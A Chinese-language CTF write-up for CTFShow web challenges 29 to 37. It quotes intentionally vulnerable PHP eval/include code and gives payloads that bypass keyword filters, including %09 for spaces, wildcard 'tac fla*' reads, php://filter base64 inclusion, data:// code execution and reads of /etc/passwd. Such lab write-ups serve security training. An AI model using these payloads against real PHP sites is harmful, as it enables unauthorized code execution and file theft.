CTFShow-web-命令执行
源码:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:26:48
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}分析源码得知过滤了字符串flag和i
system("ls")命令执行成功,那就是要读取flag文件
因为flag是被过滤的,但是可以利用*代替完整的文件名去读取文件
然后cat在这题是读不出flag的,因为flag存储在一个php文件中,然后cat是将文件内容按行顺序输出的,如果要用cat去读的话,是按照<?php格式去执行,但是因为文件中没有echo输出,所以就无法读出flag,tac是将文件内容按行倒序输出的,就避开了<?php,就可以正常的输出flag了
web30
源码:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}因为system函数被过滤了,只能考虑其他的函数,其他的函数还有exec、passthru、反撇号和shell_exec其中只有passthru和system会有输出到浏览器不需要echo或return来查看结果
读flag和web29一样
web31
源码:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}这里涉及到空格绕过,可以用%09绕过,system函数也是被过滤的,这里可以直接用echo命令输出查看的内容
web32
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}这题过滤了system、shell、echo等函数
php中还有一些函数是不用括号的:
<?php
echo 111;
print 1111;
die;
include "/etc/passwd";
require "/etc/passwd";
include_once "/etc/passwd";
require_once "/etc/passwd";
?>其中include "/etc/passwd"是可以利用的
源码里面也没有对$进行过滤,用$_POST[x]或者$_GET[x],然后用php伪协议将include包含的文件显示出来
payload:?c=include"$_GET[url]"?>&url=php://filter/read=convert.base64-encode/resource=flag.php
base64解码:
web33
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 02:22:27
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}方法同上,只不过是这题过滤了双引号,所以把payload改成:
?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php即可
web34-36
用web33的payload即可,原理一样
web37
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:18:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}代码中将c进行了包含,再输出flag
那么就利用伪协议去读flag
payload:c=data://text/plain,<?php system('tac fla*');?>
